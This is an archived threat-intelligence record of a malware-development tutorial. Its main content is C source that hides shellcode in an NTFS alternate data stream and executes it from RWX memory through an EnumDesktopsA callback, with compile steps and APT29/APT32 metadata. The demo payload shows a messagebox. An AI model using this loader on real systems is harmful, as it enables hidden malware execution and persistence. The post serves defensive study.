{ "id": "af2bdf5b-8bc0-48ef-bb8c-8a4a1690af50", "created_at": "2026-04-06T00:09:47.591786Z", "updated_at": "2026-04-10T03:37:16.728323Z", "deleted_at": null, "sha1_hash": "732017a4530cc3cb877e03add211fa88c22ec704", "title": "Malware development trick - part 35: Store payload in alternate data streams. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 935601, "plain_text": "Malware development trick - part 35: Store payload in alternate\r\ndata streams. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2023-07-26 · Archived: 2026-04-05 22:52:40 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nToday, this post is the result of my own research on another popular malware development trick: store malicious\r\ndata in alternate data streams (ADS) and how adversaries use it for persistence.\r\nalternate data streamsPermalink\r\nAlternate Data Streams allow for multiple data “streams” to be associated with a single filename, a capability that\r\ncan be used to store metadata. While this feature was designed to support Macintosh Hierarchical File System\r\n(HFS) which uses resource forks to store icons and other information for a file, it can be and has been used for\r\nhiding data and malicious code.\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 1 of 8\n\npractical examplePermalink\r\nBelow is a simple example code of storing payload in ADS hack.c :\r\n/*\r\nhack.c\r\nmalware store data in alternate data streams\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nint main() {\r\n // name of the file to which we'll attach the ADS\r\n char* filename = \"C:\\\\temp\\\\meow.txt\";\r\n // name of the ADS\r\n char* streamname = \"hiddenstream\";\r\n // full path including the ADS\r\n char fullpath[1024];\r\n sprintf(fullpath, \"%s:%s\", filename, streamname);\r\n // the data we're going to write to the ADS\r\n // meow-meow messagebox\r\n unsigned char my_payload[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 2 of 8\n\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\n printf(\"original payload: \");\r\n for (int i = 0; i \u003c sizeof(my_payload); i++) {\r\n printf(\"%02x \", my_payload[i]);\r\n }\r\n printf(\"\\n\\n\");\r\n // write data to the ADS\r\n HANDLE hFile = CreateFile(fullpath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);\r\n printf(hFile == INVALID_HANDLE_VALUE ? \"unable to open file!\\n\" : \"successfully write payload data to the ADS\\\r\n DWORD bw;\r\n WriteFile(hFile, my_payload, sizeof(my_payload) - 1, \u0026bw, NULL);\r\n CloseHandle(hFile);\r\n // now read the data back\r\n hFile = CreateFile(fullpath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\r\n printf(hFile == INVALID_HANDLE_VALUE ? \"unable to open file!\\n\" : \"successfully read payload data from file\\n\"\r\n unsigned char data[sizeof(my_payload) - 1];\r\n DWORD br;\r\n ReadFile(hFile, data, sizeof(data), \u0026br, NULL);\r\n CloseHandle(hFile);\r\n printf(\"read from file, payload:\\n\");\r\n for (int i = 0; i \u003c sizeof(data); i++) {\r\n printf(\"%02x \", data[i]);\r\n }\r\n printf(\"\\n\\n\");\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, data, sizeof(data));\r\n EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);\r\n return 0;\r\n}\r\nThe logic is pretty simple. This code writes data to an ADS and then reads it back. Then execute payload data via\r\nEnumDesktopsA.\r\nAs usually, I used meow-meow messagebox for simplicity:\r\nunsigned char my_payload[] =\r\n\"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 3 of 8\n\n\"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n\"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n\"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n\"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n\"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n\"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n\"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n\"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n\"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n\"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n\"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n\"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n\"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n\"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n\"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nThis code creates an ADS named hiddenstream on the specified file and writes our payload data into it. It then\r\nreads the data back and prints it for checking correctness. In a real-world scenario, the data could be a malicious\r\nexecutable like reverse shell or another shellcode, which would need to be extracted to a temporary location and\r\nexecuted separately.\r\ndemoPermalink\r\nLet’s go to see this logic in action.\r\nCompile it:\r\nx86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sec\r\nThen, move our test victim file meow.txt to C:\\temp\\ :\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 4 of 8\n\nAnd finally run:\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 5 of 8\n\nWe can check alternate data streams with command:\r\nGet-Item -Path C:\\temp\\meow.txt -Stream *\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 6 of 8\n\nAs you can see, everything is worked as expected! =^..^=\r\nNote that the Alternate Data Streams (ADS) feature is specific to NTFS , other file systems like FAT32 , exFAT ,\r\next4 (used by Linux), etc., do not support this feature.\r\nThis method of executing code is often used by APT29 and APT32, software like PowerDuke\r\nI hope this post spreads awareness to the blue teamers of this interesting malware dev technique, and adds a\r\nweapon to the red teamers arsenal.\r\nT1564.004 - Hide Artifacts: NTFS File Attributes\r\nAPT29\r\nAPT32\r\nmalpedia: APT29\r\nmalpedia: APT32\r\nPowerDuke\r\nsource code in github\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 7 of 8\n\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nhttps://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html" ], "report_names": [ "malware-tricks-35.html" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434187, "ts_updated_at": 1775792236, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/732017a4530cc3cb877e03add211fa88c22ec704.pdf", "text": "https://archive.orkl.eu/732017a4530cc3cb877e03add211fa88c22ec704.txt", "img": "https://archive.orkl.eu/732017a4530cc3cb877e03add211fa88c22ec704.jpg" } }